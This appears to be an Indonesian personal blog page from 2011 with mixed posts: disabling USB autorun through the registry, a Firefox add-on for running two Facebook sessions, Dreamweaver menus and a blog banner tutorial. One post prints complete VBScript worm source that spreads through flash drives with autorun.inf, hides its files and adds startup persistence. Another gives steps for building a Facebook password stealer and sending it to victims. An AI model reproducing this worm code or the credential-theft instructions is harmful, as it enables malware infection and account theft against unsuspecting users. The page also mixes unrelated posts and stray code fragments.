isi Blog Ini

Pages

Diberdayakan oleh Blogger.
Popular News [ View all Popular News ]

Latest Updates

Jumat, 09 Desember 2011

mencegah virus dr flashdick

Dengan penggunaan flashdisk yang sudah umum dimana-mana, menjadi salah satu sebab menjamurnya virus, terutama virus lokal. Ini terlihat sejak masa jayanya virus brontok. Sampai saat ini, saya sering sekali melihat hampir setiap komputer/laptop teman-teman di perkantoran terkena virus, yang terkadang mereka tidak menyadari. Selain Antivirus yang seharusnya senantiasa diupdate minimal seminggu sekali, sebenarnya ada tips yang sangat bermanfaat untuk mencegah menularnya virus dari media seperti flashdisk tanpa kita sadari. Berikut langkah-langkahnya :

1.

Buka Registry Editor, dengan cara klik Start Menu > Run dan ketik regedit dan klik OK
2.

Cari Lokasi :
KEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
3.

Buat key baru ( Klik kanan > New > DWORD Value ) beri nama : NoDriveAutoRun
4.

Double klik untuk mengisi nilai ( data ). Pilih Base : Decimal dan isikan Value data dengan nilai 67108863


5.

Jika diperlukan, dapat juga menambahkan nilai yang sama di
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
6.

Restart Komputer

Dengan penambahan setting ini, maka ketika kita memasang flashdisk, windows tidak akan otomatis menjalankan program autorun yang ada di flashdisk.

Settings:
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoDriveAutoRun
Type: REG_DWORD (DWORD Value)
Value: 32-bit bitmask

{kesalahan bunyi beep pd kmputer}

http://toto.nurulfikri.com/?page=Article&link=art&pg=POST

Rabu, 07 Desember 2011

Mencegah virus dr flashdick

Ini pasti dibutuhkan Anda yg baca tutorial yg saya buat

Dengan penggunaan flashdisk yang sudah umum dimana-mana, menjadi salah satu sebab menjamurnya virus, terutama virus lokal. Ini terlihat sejak masa jayanya virus brontok. Sampai saat ini, saya sering sekali melihat hampir setiap komputer/laptop teman-teman di perkantoran terkena virus, yang terkadang mereka tidak menyadari. Selain Antivirus yang seharusnya senantiasa diupdate minimal seminggu sekali, sebenarnya ada tips yang sangat bermanfaat untuk mencegah menularnya virus dari media seperti flashdisk tanpa kita sadari. Berikut langkah-langkahnya :

1.

Buka Registry Editor, dengan cara klik Start Menu > Run dan ketik regedit dan klik OK
2.

Cari Lokasi :
KEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
3.

Buat key baru ( Klik kanan > New > DWORD Value ) beri nama : NoDriveAutoRun
4.

Double klik untuk mengisi nilai ( data ). Pilih Base : Decimal dan isikan Value data dengan nilai 67108863


5.

Jika diperlukan, dapat juga menambahkan nilai yang sama di
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
6.

Restart Komputer

Dengan penambahan setting ini, maka ketika kita memasang flashdisk, windows tidak akan otomatis menjalankan program autorun yang ada di flashdisk.

Settings:
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoDriveAutoRun
Type: REG_DWORD (DWORD Value)
Value: 32-bit bitmask

mau tau tenteng cara membuka fb dlm 1 browser

Haloo Brow/Gan/sis
ah kelamaan j saya pgl nya
langsung j


bingung atau mbingung
kalau pada tau tutorial ini ya bersyukur klu blm ya baca ni j
tapi khusus pengguna Mozilla firefox mf bagi yang lain..
langsung aja
pertama instal add-ons Cookiepie
di

http://www.nektra.com/oss/firefox/extensions/cookiepie/

klik tulisan Install Extension terus restart firefox

cara gunanya :
buka facebook anda dulu terus tekan tombol Ctrl+T atau klik file lalu pilih new tab pada tab yang masih kosong klik kanan pilih toogleon/off cookie, nah buka deh akun yang berbeda, selamat mencoba...!!

Kamis, 24 November 2011

untuk luar negri bisa ni cara main dream weaver baca n copy jg blh kok

How to use Dreamweaver Menu extension

Vista Buttons wasn't developed as Dreamweaver extension,BUT you can use it as standard Javascript files. To install the menuinto your html page you should do the following things:

1). Create and save your buttons in any temp folder using Vista Buttons application. It will be better to export all menu code to external .js file. Go to "Tools/Export options...". Check "Save all menu params to js file" option.

You can use "Save as HTML" function.

You can enter any name you like, for example enter "menu":

So you'll have menu.html file and "menu-files" folder with all menu files.

2). You can add javascript drop down menu to a single page or to many pages using library or Dynamic Web Template so that you won't have to add it into each page separately.

B.INDONESIA
Cara menggunakan Dreamweaver ekstensi menu

Tombol Vista tidak dikembangkan sebagai ekstensi Dreamweaver, NAMUN Anda dapat menggunakannya sebagai file standar Javascript. Untuk menginstal menuinto halaman html Anda Anda harus melakukan hal-hal berikut:

1). Membuat dan menyimpan tombol Anda dalam folder temp menggunakan Vista Tombol aplikasi. Ini akan lebih baik untuk ekspor semua kode menu untuk eksternal. File js. Pergi ke "Tools / pilihan Ekspor ...". Periksa "Simpan semua params menu untuk Js file" pilihan.

Anda dapat menggunakan "Simpan sebagai HTML" fungsi.

Anda dapat memasukkan nama yang Anda sukai, misalnya masukkan "menu":

Jadi Anda akan memiliki file menu.html dan "menu file" folder dengan semua file menu.

2). Anda dapat menambahkan javascript menu drop-down ke halaman tunggal atau banyak halaman menggunakan perpustakaan atau Template Web Dinamis sehingga Anda tidak perlu menambahkannya ke halaman masing-masing secara terpisah.

Selasa, 22 November 2011

TUTORIAL BUAT VIRUS N ANTIVIRUSNYA

GUNAKAN UNTUK BELAJAR DENGAN BAIK
JANGAN SAMPE DIGUNAKAN YANG TIDAK SEWAJARNYA/MERUSAK/MERUGIKAN ORANG LAIN
TUTORIAAL INI SEMOGA TIDAK ADA YANG DIRUGIKAN

Mungkin anda sudah mengenal apa itu virus VBS, Virus VBS adalah virus sederhana menggunakan bahasa Program (Visual Basic) yang bisa merusak dari tingkat kerusakan rendah sampai tinggi. Virus ini hanya bermodalkan pengetahuan akan bahasa Program dan aplikasi Notepad. Berikut adalah cara pembuatannya:

1. Buka Notepad

2. Copy dan Paste skript Berikut:

------------------------------Skript------------------------------
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMS32DLL",winpath&"MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title","Hacked by Zeke Hack"
rg.regwrite "HKCRvbsfileDefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname
---------------------------akhir skript---------------------------

3. Save as, ubah save as type menjadi "all files", simpan dengan format ".vbs", misal Hx.vbs.

Virus ini dapat menggandakan sendiri pada semua Direktori termasuk Flash Disk.
__________________________________________________________________
----Gunakanlah Tutorial Dengan Bijak----


mencegah viruses masuk ke komputer qt
ini
Langkah-langkahnya simpelnya sebagai berikut :


- Pada folder c:\windows dan c:\windows\system32 untuk semua file yang ber-ekstensi *.exe dan *.com bisa di "Read Only", yang bertujuan agar tidak dapat diediting/dirubah oleh virus.

- My Computer Klik kanan --> Propertise --> System Restore --> Centang : Turn Of System Restore On All Drives

- Disable Autorun
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer --> NoDriveTypeAutoRun ( ganti dengan FF )


- Disable Autorun/Autoplay melalui Group Policy [GPEDIT.MCS], caranya:


Klik menu + Start

Klik Run

Ketik : GPEDIT.MSC

Setelah muncul layar “Group Policy” klik folder “System” pada menu “User Configuration” dan “Computer Configuration”

Pada kolom Settings, klik dua kali “Turn off Autoplay”

Setelah muncul layar “Turn off Autoplay” properties, klik tabulasi [Settings] dan pilih opsi “Enable” pada menu “Turn off Autoplay” kemudian Pilih “All Drive” pada kolom “Turn off Autoplay on”

- Bisa menggunakan Register Monitoring, untuk mengontrol setiap saat perubahan pada register yang dikehendaki maupun tidak ( seperti : scotty dll )
#
hey lol che

TUTORIAL
STEP 1: First ensure that you have installed Microsoft .Net Framework. If not, then you can download it from here: Download .Net Framework
STEP 2: DOWNLOAD the Facebook Hacker by Clicking Here!
STEP 3: Extract the downloaded “Facebook Hacker” file using Winrar. (If you don’t have it then you can GET IT HERE)
STEP 4: Open “Facebook Hacker.exe” file.


STEP 5: After opening the “Facebook Hacker.exe” file build your password stealer as shown in the image below:
Click on the image to Enlarge it.
STEP 6: Now a new file will be created in the same directory with the name you provided while building (eg. server.exe). Just send the file you created to the victim and if the victim runs this file….W00t….you will get his Facebook account’s username and password to your fake email ID which you provided while building the file.

function showads() {
return ‘
‘;
}
add_shortcode(‘adsense’, ‘showads’);

segenap he'cker di se indonesia
tutorial kami
dikembangkan oleh anak he'ckers se indonesia
yogyakarta pun ikut serta lho coooyyy
ayo yg mengaku anak IT /HE'CKERS cb ya ma dap
ayo cb dan praktrikan
ini yang telah saya pelajari
sekian dan terima kasih

Kamis, 17 November 2011

ttutorial banner blogger

Membuat banner blognya. Karena saya tahu sedikit tentang pembuatan banner blog ini maka saya coba membantu semampu yang saya bisa. Mudah-mudahan bermanfaat untuk para blogger newbie yang ingin membuat banner blog.

Jika kita perhatikan hasil jadi desain banner saya yang sederhana meski kecil tapi cukup bisa menarik perhatian (benarkah?) ^_^ mungkin karena tulisan pada banner kecil tersebut berkedip-kedip. Susah membuatnya? Tidak juga, malahan mudah kok! Syaratnya Anda bisa mengoperasikan dasar-dasar penggunaan Adobe PhotoShop CS2 dan Image Ready. Silahkan ikuti tutorialnya di bawah ini.

Ukuran banner pada tutorial ini disesuaikan dengan postingan saya terdahulu tentang Penyeragaman ukuran Banner Blogger. Jika Anda ingin banner yang lebih besar silahkan saja setelah Anda mempelajari tutorial ini.

Oke, kita langsung saja,

Bagian Pertama (Membuat Bingkai dan Teks):

Buka Adobe Photoshop CS2
Buka file baru dengan mengklik menu File>New. Pada kotak dialog New

a. Name: Beri nama file dengan nama Anda.

b. Width: 81 pixels

c. Height: 16 pixels

d. Resolution: 72 pixels/inch

e. Color mode: RGB 8 bit

f. Background Content: Transparent.(*)

g. Color Profile: Working RGB: sRGB IEC61966-2.1

h. Pixel Aspect Ratio: Square

i. Klik OK

Perbesar ukuran window kanvas dengan menarik ujung bagian bawah.
Perbesar kanvas dalam dengan menggunakan Zoom Tool (Z) (+).
Buatlah background untuk banner Anda dengan menggunakan Rectangle Tool (U). Sesuaikan dengan ukuran kanvas. Jika sudah ubahlah menjadi Shape dengan mengklik menu Layer >Raterized >Shape.Buatlah bidang seleksi berbentuk Marquee (kotak) dengan menggunakan Rectangular Marquee Tool (M) di atas background lalu klik menu Edit >Clear, sehingga background Anda berbentuk list kotak (bingkai) seperti pada banner saya (contoh).
Buatlah teks nama Blog Anda (contoh, Hakimtea) di tengah-tengah bingkai menggunakan Horizontal Type Tool (T). Sesuaikan ukuran teks dengan bingkai menggunakan Move Tool.
Tambahkan efek Bavel and Embos dengan mengklik menu Layer >LayerStyle >Bevel and Embos (tambahkankan pengaturan lain jika Anda mau seperti drop shadow, inner shadow, outer glow, dll) klik OK jika sudah.
Save dahulu pekerjaan Anda bagian pertama ini.

Bagian Kedua (Membuat Animasi Teks Banner “berkedip-kedip”)

Masih di Adobe Photoshop CS2 dengan banner Anda yang sudah setengah jadi pada bagian pertama di atas.
Berpindahlah sekarang ke dalam menu editing Adobe ImageReady CS2 dengan mengklik menu File >Edit in ImageReady (Ctrl+Shift+M). Tunggu sebentar, maka lembar kerja Adobe ImageReady CS2 akan terbuka.
Perhatikan, untuk membuat animasi “teks berkedip” Windows Animasi harus tersedia, jika belum ada, Anda bisa memunculkannya dengan mengklik menu Window>Animation.
Untuk membuat animasi, pertama-tama kita akan bekerja dengan menu Layers. Klik ikon mata pada layer teks nama Anda. Sehingga ikon mata tidak terlihat dan otomatis teks nama Anda pun tidak terlihat. Sedangkan untuk bingkai biarkan saja terlihat.
Pindahlah ke jendela Animation, lalu klik ikon Duplicate Current Frame. Anda sekarang mempunyai dua frame di jendela animation. Klik ikon mata pada layer teks nama Anda sehingga terlihat. Hasilnya frame pertama teks nama Anda tidak terlihat sedangkan pada frame yang kedua teks nama Anda terlihat.
Sekarang aturlah waktu “teks berkedip” pada jendela Animation. Klik pada Selects Frame Delay Time di bawah frame pertama dan kedua di jendela animation. Contoh: Beri waktu 0.5 pada kedua frame.
Untuk mencoba animasi teks Anda klik Plays/Stops Animation masih di jendela animation.
Kalau waktu berkedipnya sudah terasa cukup (tidak terlalu cepat juga tidak terlalu lambat)
Langkah berikutnya, simpan pekerjaan Anda dengan mengklik menu File >Save Optimized (Ctrl+Alt+S). Pada Save as Type Anda pilih extensi Image Only (*.gif) klik Save.

Bagian Ketiga (Ubah File GIF Anda Dalam Bentuk URL):

Untuk mengubah file gif dalam bentuk URL, Anda memerlukan web yang menyediakan layanan tersebut. Dan ternyata banyak sekali web yang menyediakan layanan secara gratisan, free atau orang malay biang ‘percuma’ ^_^ diantaranya Photobucket, servimg, dan layanan gratis lainnya. Atau jika Anda sudah memiliki account gmail Anda bisa mengaktifkan googlepages dan mengupload file photo disana, atau bisa juga dengan menggunakan layanan Picasa dengan menggunakan account gmail juga.
Namun untuk mempermudah saya anjurkan untuk menggunakan layanan dari servimg karena Anda cukup mendaftar dengan account email yang manapun dan tanpa adanya email aktivasi. Cukup mendaftar, login dan Anda bisa langsung mengupload photo.

Bagian Keempat (Memasang Banner Di Blog Sendiri dan Menyediakan Tag HTML untuk Tukar Link)

Diantara keempat bagian ini, rasanya bagian terakhir yang paling menarik dan mendebarkan ^_^. Khususnya untuk saya. (karena salah sedikit saja memberikan tag HTML bisa hancur semuanya)
Ok, setelah mempunyai URL banner, Anda memerlukan Tag HTML agar bisa disimpan pada elemen html yang ditempatkan di sidebar blog sekaligus untuk memudahkan bertukar link. Dan saat seseorang mengklik banner Anda di blog lain (yang telah bertukar link) langsung di arahkan menuju blog Anda, seperti halnya di bawah,

Danangherix.com

”danangherix.com”


Tukeran Link Yuk…!

Silahkan copy kode di atas…!

Saya akan segera link balik…!

Tag HTMLnya sebagai berikut,


NAMA-ANDA.BLOGSPOT.COM



Tukeran Link Yuk...!
Silahkan copy kode di atas...!
Saya akan segera link balik...!


Anda tinggal mengganti:

URL-BLOG-ANDA: (contoh, URL blog saya yang “dulu” http://danangherix.blospot.com)*
NAMA-ANDA.BLOGSPOT.COM: (contoh nama blog saya, Danangherix.blogspot.com)*
URL-GAMBAR-ANDA: (contoh URL gambar saya, http://i27.servimg.com/u/f27/11/83/04/92/banner10.gif)*

* NOTE: perhatikan pergantiannya 2 kali; satu agar tampil langsung sebagai banner Anda dan yang satu lagi tampil di teks area untuk memudahkan blogger lain mengcopy-paste kode HTML banner Anda.

Sebagai contoh saya masukan URL Blog, Nama blog, dan URL gambar “saya” ke dalam tag HTML di atas, maka kodenya jadi seperti di bawah ini,


danangherix.blogspot.com



Tukeran Link Yuk...!
Silahkan copy kode di atas...!
Saya akan segera link balik...!


Perhatikan penyimpanan URL BLOG ANDA, NAMA BLOG ANDA dan URL GAMBAR ANDA… silahkan dicoba!

Daftar Blog Saya

Total Tayangan Halaman